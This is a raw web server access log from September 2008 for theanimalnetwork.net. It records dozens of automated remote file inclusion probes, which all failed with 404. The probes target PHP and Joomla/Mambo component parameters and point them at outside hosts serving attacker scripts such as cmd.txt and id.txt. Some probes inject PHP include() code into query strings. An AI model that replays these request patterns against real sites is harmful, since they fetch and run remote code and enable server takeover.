83.240.154.200 - - [07/Sep/2008:03:55:54 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
83.240.154.200 - - [07/Sep/2008:03:55:54 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
83.240.154.200 - - [07/Sep/2008:03:55:55 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
211.255.32.168 - - [07/Sep/2008:03:56:16 -0700] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
193.164.131.35 - - [07/Sep/2008:04:04:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:04:05:33 -0700] "GET /home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
139.146.146.34 - - [07/Sep/2008:04:08:08 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:04:08:53 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:10:13 -0700] "GET /home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:10:21 -0700] "GET /phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:11:32 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
85.17.10.109 - - [07/Sep/2008:04:18:13 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:18:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
193.164.131.35 - - [07/Sep/2008:04:22:37 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
193.164.131.35 - - [07/Sep/2008:04:22:37 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:04:22:41 -0700] "GET /logs//parse/parser.php?WN_BASEDIR=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:04:22:41 -0700] "GET //parse/parser.php?WN_BASEDIR=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:22:46 -0700] "GET /logs/access_080720.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:22:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:22:47 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:22:47 -0700] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:04:23:36 -0700] "GET /logs/access_080731.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:04:23:37 -0700] "GET /logs/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:04:23:59 -0700] "GET /logs/access_080723.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:28:22 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:04:28:22 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:04:28:22 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:04:28:22 -0700] "GET /logs/access_080723.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:28:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
74.200.202.37 - - [07/Sep/2008:04:28:27 -0700] "GET /logs/access_080729.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:30:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:04:31:45 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:04:31:45 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:32:22 -0700] "GET /logs/access_080723.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:32:23 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:33:14 -0700] "GET /logs/access_080729.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:37:26 -0700] "GET /logs/access_080720.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:37:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:37:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:04:39:08 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:04:39:08 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:04:41:16 -0700] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:41:26 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:43:55 -0700] "GET /logs/access_080731.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:43:56 -0700] "GET /logs/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:04:45:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:48:00 -0700] "GET /logs/access_080723.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
69.93.116.170 - - [07/Sep/2008:04:48:16 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
69.93.116.170 - - [07/Sep/2008:04:48:16 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
69.93.116.170 - - [07/Sep/2008:04:48:16 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
69.93.116.170 - - [07/Sep/2008:04:48:17 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
69.93.116.170 - - [07/Sep/2008:04:48:17 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
69.93.116.170 - - [07/Sep/2008:04:48:17 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:48:46 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
67.15.48.60 - - [07/Sep/2008:04:49:19 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.15.48.60 - - [07/Sep/2008:04:49:19 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.15.48.60 - - [07/Sep/2008:04:49:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
66.187.101.14 - - [07/Sep/2008:04:49:43 -0700] "GET /phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
63.247.142.207 - - [07/Sep/2008:04:51:41 -0700] "GET /logs/access.log/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.theanimalnetwork.net"
63.247.142.207 - - [07/Sep/2008:04:51:41 -0700] "GET /index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.theanimalnetwork.net"
63.247.142.207 - - [07/Sep/2008:04:51:41 -0700] "GET /logs/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.theanimalnetwork.net"
66.187.101.14 - - [07/Sep/2008:04:52:24 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.29.92.206 - - [07/Sep/2008:04:52:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:04:52:49 -0700] "GET /phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:04:53:41 -0700] "GET /logs/access_080723.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:04:53:42 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:04:53:42 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:53:44 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
200.49.145.16 - - [07/Sep/2008:04:53:45 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:04:54:34 -0700] "GET /logs/access_080729.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
121.135.142.207 - - [07/Sep/2008:04:55:02 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
121.135.142.207 - - [07/Sep/2008:04:55:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
121.135.142.207 - - [07/Sep/2008:04:55:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:04:55:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:04:55:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "theanimalnetwork.net"
85.17.10.109 - - [07/Sep/2008:04:56:59 -0700] "GET /logs/access_080724.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
85.17.10.109 - - [07/Sep/2008:04:57:00 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
85.17.10.109 - - [07/Sep/2008:04:57:00 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
89.36.21.170 - - [07/Sep/2008:04:57:10 -0700] "GET /logs/access.log/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.theanimalnetwork.net"
89.36.21.170 - - [07/Sep/2008:04:57:11 -0700] "GET /index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.theanimalnetwork.net"
89.36.21.170 - - [07/Sep/2008:04:57:11 -0700] "GET /logs/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:04:57:57 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:04:57:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
63.247.142.207 - - [07/Sep/2008:04:59:41 -0700] "GET /logs/access_080729.log/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
63.247.142.207 - - [07/Sep/2008:04:59:41 -0700] "GET /index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
63.247.142.207 - - [07/Sep/2008:04:59:41 -0700] "GET /logs/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
85.214.53.78 - - [07/Sep/2008:05:00:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://beherit.interfree.it/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
85.214.53.78 - - [07/Sep/2008:05:00:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://beherit.interfree.it/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:05:01:33 -0700] "GET /logs/access_080723.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:05:01:34 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:05:02:29 -0700] "GET /logs/access_080729.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:05:06:47 -0700] "GET /logs/access_080723.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:05:06:47 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:05:06:48 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
74.6.22.166 - - [07/Sep/2008:05:06:51 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "theanimalnetwork.net"
89.36.21.170 - - [07/Sep/2008:05:08:18 -0700] "GET /logs/access_080729.log/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
89.36.21.170 - - [07/Sep/2008:05:08:18 -0700] "GET /index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
89.36.21.170 - - [07/Sep/2008:05:08:18 -0700] "GET /logs/index.php?cont=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:05:08:21 -0700] "GET /logs/access_080729.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:05:09:25 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:05:09:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:05:14:13 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:05:14:13 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:05:14:14 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
67.15.80.42 - - [07/Sep/2008:05:17:17 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "theanimalnetwork.net"
67.15.80.42 - - [07/Sep/2008:05:17:17 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "theanimalnetwork.net"
67.15.80.42 - - [07/Sep/2008:05:17:17 -0700] "GET /logs/access.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "theanimalnetwork.net"
67.15.80.42 - - [07/Sep/2008:05:17:20 -0700] "GET /logs/access.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "theanimalnetwork.net"
67.15.80.42 - - [07/Sep/2008:05:17:20 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "theanimalnetwork.net"
67.15.80.42 - - [07/Sep/2008:05:17:20 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "theanimalnetwork.net"
92.51.145.83 - - [07/Sep/2008:05:27:53 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
58.26.163.11 - - [07/Sep/2008:05:27:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://cuza-voda.go.ro/b?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "theanimalnetwork.net"
